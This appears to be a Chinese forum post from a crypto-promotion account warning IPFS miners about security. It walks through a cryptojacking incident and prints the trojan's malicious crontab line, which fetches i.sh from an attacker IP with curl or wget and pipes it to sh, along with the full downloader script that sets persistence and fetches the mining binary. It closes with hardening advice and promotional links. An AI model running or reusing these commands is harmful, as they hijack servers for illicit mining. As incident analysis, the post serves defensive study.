【币码翁】 IPFS挖矿不得不重视的安全问题

显示全部楼层 · 发表于 2019-5-16 07:00:02

众所周知，网络安全对于互联网公司来说至关重要，虽然，它不能直接创造业务价值，但却可以决定一家公司的生死。即使公司业务做得再好，一旦遇到严重的安全问题，便立马完蛋！

从阿里、腾讯对安全的重金投入就可以得知其重要性。区块链领域就更重要了。一个交易所如果被盗，基本就直接破产了。
但在存储挖矿领域，这个问题没有引起多少人的重视。相信在FIL正式开挖之前，也不会有太多的人重视，大家关注的比较多的还是能挖到多少，对于各种技术细节也并不关心。
但存储挖矿本身属于一种有风险属性的投资行为。如果不重视网络安全，这种风险就会急剧放大。尤其是在FIL之前上线的许多存储链，都要求：每个节点都需要公网IP。此要求会让大量没有网络安全防护的机器直接暴露在公网上面，必定会导致更多的安全问题。直接提供公网IP本身不是一个问题。
但关键是安全防护工作要能匹配。对矿工来讲，追求的是快速回本，不会像互联网公司和传统企业那样投入大量的成本去搞安全这些事情。从硬件投入就可以看到。对企业业务来讲，几万元的服务器比比皆是，但对矿工来讲，几千块钱的机器都嫌贵。

最近又遇到了一个案例。我们来简单分析一下。希望大家能够引起重视，不要出现投入资金和精力，最后却导致给远方的黑客打工的情况。
通过运维平台，发现某个节点的CPU利用率异常。在获得相关授权之后，登录该系统。发现存在可疑进程vTtHH。以下是top的输出。（正常的挖矿进程名我隐藏了，用xxx代替。）
PIDUSER PR NI VIRT RES SHRS %CPU%MEM TIME+COMMAND 2083root 20 0 191992 33760 1220S 1501 0.2157845:23/tmp/vTtHH 22718miner 20 080723841.470g 23104S 10.6 9.4 3443:17xxx
俗话说，人不可貌相。但是一般的程序却可以直接通过名字来判断其到底做了什么事情。木马可以伪装成正常进程的名字，但vTtHH这个名字，一看就知道不是善类，估计是随机生成的。而且这个可执行文件放在/tmp目录下。除了安装程序调用的一些临时程序，一般的程序员不会在/tmp下面放重要的可执行文件。最关键的是，它基本把CPU吃光了。看看它的MD5值：
#md5sum/tmp/vTtHH42483ee317716f87687ddb79fedcb67b /tmp/vTtHH
Google搜索这个MD5，果然是木马程序。比如，有这篇文章
https://blog.netlab.360.com/systemdminer-propagation-through-ddg/
进一步搜索，还可以看到很多相关的讨论
https://www.v2ex.com/t/560438

讨论的内容都是最近发布的，看来这是一个新的木马。它是一个恶意挖矿程序，借用机器挖它的矿。你付出了机器成本、电费、网络费用，却是帮别人在打工。
看看它到底往哪里发数据
#netstat-anp|grepvTtHHtcp 0 104***.***.***.***:51200 104.130.210.206:8000 ESTABLISHED16154/vTtHH
查询到的IP信息：
您查询的IP:104.130.210.206本站数据：美国伊利诺斯芝加哥参考数据1：美国伊利诺伊州芝加哥ManagedDedicated&CloudComputingServices
可以想到的是，直接kill这个进程没有什么用处，它又会死灰复燃的。看看定时任务
#crontab-l*/15****(/usr/bin/izxbfa2||/usr/libexec/izxbfa2||/usr/local/bin/izxbfa2||/tmp/izxbfa2||curl-m180-fsSLhttp://104.128.230.16:8000/i.sh||wget-q-T180-O-http://104.128.230.16:8000/i.sh)|sh

通过它可以找到一堆的可疑文件。怎么清除这些文件可以看以前的文章？
在没有这些文件的时候，它会从http://104.128.230.16:8000/i.sh下载脚本。
打开看看这个脚本是什么玩意儿
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinmkdir-p/var/spool/cron/crontabsecho"">/var/spool/cron/rootecho"*/15****(/usr/bin/iugkfa2||/usr/libexec/iugkfa2||/usr/local/bin/iugkfa2||/tmp/iugkfa2||curl-fsSL-m180http://104.128.230.16:8000/i.sh||wget-q-T180-O-http://104.128.230.16:8000/i.sh)|sh">>/var/spool/cron/rootcp-f/var/spool/cron/root/var/spool/cron/crontabs/rootcd/tmptouch/usr/local/bin/writeable&&cd/usr/local/bin/touch/usr/libexec/writeable&&cd/usr/libexec/touch/usr/bin/writeable&&cd/usr/bin/rm-rf/usr/local/bin/writeable/usr/libexec/writeable/usr/bin/writeableexportPATH=$PATH(pwd)psauxf|grep-vgrep|grepiugkfa2||rm-rfiugkfa2if[!-f"iugkfa2"];then curl-fsSL-m1800http://104.128.230.16:8000/static/4002/ddgs.$(uname-m)-oiugkfa2||wget-q-T1800http://104.128.230.16:8000/static/4002/ddgs.$(uname-m)-Oiugkfa2fichmod+xiugkfa2/usr/bin/iugkfa2||/usr/libexec/iugkfa2||/usr/local/bin/iugkfa2||/tmp/iugkfa2psauxf|grep-vgrep|grepiugkbcb|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grepiugkbcc|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grepiugkbcd|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grepiugkbce|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grepiugkfa0|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grepiugkfa1|awk'{print$2}'|xargskill-9echo"*/15****(/usr/bin/iugkfa2||/usr/libexec/iugkfa2||/usr/local/bin/iugkfa2||/tmp/iugkfa2||curl-m180-fsSLhttp://104.128.230.16:8000/i.sh||wget-q-T180-O-http://104.128.230.16:8000/i.sh)|sh"|crontab-
通过它来学习bash还是不错的。可惜了这个作者，不务正业。清除了crontab以及相关文件，系统恢复正常。

下一步就是帮忙分析到底是怎么被入侵的。主要有几种原因
1.弱密码
密码一定要强，大写、小写、数字、符号最好都用上。当然，你自己不能忘记。ssh登录最好禁止密码方式，采用密钥登录。
2.系统漏洞
好的软件能够防范已知的漏洞，未知的漏洞还得靠运维的不断加强。
挖矿软件的漏洞。我估计这块是重头戏。许多挖矿软件都对外暴露了很多端口，加大了被入侵的可能性。任何软件都是有Bug的，放在网络里的任何软件都是有漏洞的，只是已知和未知的区别。
3.内部人员或者第三方进入机房的人员导致
这种可能性一般较小，本文中的例子更不太像。但很多时候，这也是一个被入侵的手段。
有一劳永逸永保网络安全的方案吗？没有。应对方法就是一定要熟悉网络安全防护，通过特定的软件和加强的运维来保障系统的安全性。

币码翁“IPFS星际特工”全球合伙人招募中
咨询热线:400-999-6865
相关阅读【币码翁】IPFS周报：FIL0.2.2版正式发布！
【币码翁】为什么说这个世界可以没有BTC，但不能没有IPFS？
【币码翁】数据黑洞危机下，下一个万亿市场是分布式存储
【币码翁】2019年“全球区块链分布式存储技术高峰论坛”在镇江隆重举行！
IPFS星际特工强势登入美国纳斯达克大屏及北京中关村创业大街大屏，蓄势引领区块链行业潮流！
声明：本文章不作为投资理财建议，投资有风险，入市需谨慎。
来源：全球币码翁区块链研究院
本期编辑：Alice

【币码翁】 IPFS挖矿不得不重视的安全问题.jpg

【币码翁】 IPFS挖矿不得不重视的安全问题

相关帖子